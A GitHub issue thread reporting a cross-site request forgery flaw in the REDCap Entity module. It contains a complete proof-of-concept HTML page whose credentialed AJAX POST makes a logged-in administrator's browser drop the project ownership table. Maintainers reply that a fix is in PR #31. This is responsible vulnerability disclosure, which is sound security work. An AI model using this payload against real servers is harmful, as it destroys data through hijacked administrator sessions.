### ISSUE TITLE
CSRF vulnerability

### ISSUE THREAD

**Issue by utiso** [ctsit/redcap_entity#30]
A Cross-Site Request Forgery (CSRF) vulnerability permits attackers to take advantage of a legitimate user’s session to perform unauthorized actions on behalf of that user. Effectively, anything the given user has permissions to do, can be done without their knowledge by the attacker. These attacks can be very difficult to trace, as the activity appears to come from the authorized user.

This vulnerability is usually exploited with a specially crafted link that the user is asked to visit but, in conjunction with a persistent XSS vulnerability, it is possible to eliminate the need for a user to take any action.This attack is made possible because the entity module does not verify the origin and authenticity of requests before processing them. All pages that process requests that update data are vulnerable.

If a currently logged-in administrator visits a web page with the following code, the Entity module will drop the project ownership table.

```html
<html>
    <head><title>Totally legit website</title></head>
    <body>
        <h1>You've been hacked</h1>
        <h3>Your Entity project ownership table has been dropped</h3>
        <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
        <script>
            $.ajax(
                            { url:"REDCapServer/ExternalModules/?prefix=redcap_entity&page=manager%2Fschema",
                                            xhrFields: {
                                                            withCredentials: true
                                                        },
                                            type:"POST", 
                                            data: {"operation":"drop","entity_type":"project_ownership","redcap_csrf_token":"foo"}, 
                                            success: function(){}
                                        });
        </script>
    </body>
</html>
```

Please make use of REDCaps built in anti-CSRF token, `redcap_csrf_token`

**Comment by ChemiKyle** [comment]
@utiso thank you very much for reporting this! I have submitted a fix and as soon as it passes review I will submit the update to the REDCap repo.

**Comment by michael-bentz** [comment]
Addressed by PR #31.
